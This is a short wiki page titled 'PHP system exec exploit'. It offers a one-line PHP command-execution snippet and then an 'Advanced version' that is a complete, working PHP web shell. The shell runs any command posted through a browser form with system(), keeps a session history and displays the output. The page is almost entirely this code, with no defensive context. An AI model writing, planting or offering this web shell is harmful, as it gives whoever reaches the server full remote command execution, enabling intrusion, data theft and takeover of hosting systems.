PHP

From Unix Wiki
Jump to: navigation, search

PHP system exec exploit

<?php
echo '<pre>';
var_dump(system('uname -a 2>&1'));

Advanced version

<?php
    session_start();

    if($_POST['clearHistory'] === 'true')
    {
        unset($_SESSION['history'], $_SESSION['stream']);

    }
?>
<!DOCTYPE html>
<html>
    <head>
        <title>Web shell</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <style>
            #cmd {width: 90%;}
        </style>
    </head>
    <body>
        <?php
            $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : null;
            if(!is_null($cmd))
            {
                $_SESSION['history'][] = $cmd;
                $_SESSION['stream'][] = '<strong>' . $cmd . '</strong>';

                $cmd .= ' 2>&1';

                ob_start();
                system($cmd);
                $_SESSION['stream'][] = ob_get_contents();
                ob_clean();
            }
        ?>

        <pre><?php echo join('<br/>', $_SESSION['stream']); ?></pre>
        <form action="" method="post" style="float: right; display: inline-block;">
            <input type="hidden" name="clearHistory" value="true" />
            <input type="submit" value="Clear history" />
        </form>
        <form action="" method="post">
            $ <input id="cmd" type="text" name="cmd" onkeypress="searchKeyPress();" value="<?php echo $_POST['cmd']; ?>" />
            <input type="submit" value="Send" />
            <script>
                document.forms[0].elements[0].focus();

                function searchKeyPress(e)
                {
                    // look for window.event in case event isn't passed in
                    if (typeof e === 'undefined' && window.event) { e = window.event; }
                    if (e.keyCode === 13)
                    {
                        document.forms[0].submit();
                    }

                    return false;
                }

                window.scrollTo(0, document.body.scrollHeight);
            </script>
        </form>
    </body>
</html>